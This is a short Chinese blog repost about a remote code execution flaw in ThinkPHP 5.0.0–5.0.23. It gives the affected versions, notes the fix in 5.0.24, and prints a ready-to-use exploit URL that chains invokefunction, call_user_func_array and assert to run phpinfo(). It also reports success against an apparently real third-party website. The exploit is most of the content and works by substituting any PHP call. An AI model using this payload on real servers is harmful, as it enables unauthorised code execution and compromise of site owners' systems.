标签:mil info index class div png 网站 alt invoke
漏洞影响范围: 5.0.0-5.0.23
官方已在5.0.24版本修复该漏洞。
测试Payload:
/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo() /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
以某个网站为例,可以看到成功执行phpinfo()函数。
ThinkPHP 5.0.0-5.0.23 远程代码执行漏洞利用
标签:mil info index class div png 网站 alt invoke
原文地址:https://www.cnblogs.com/dgjnszf/p/11219030.html
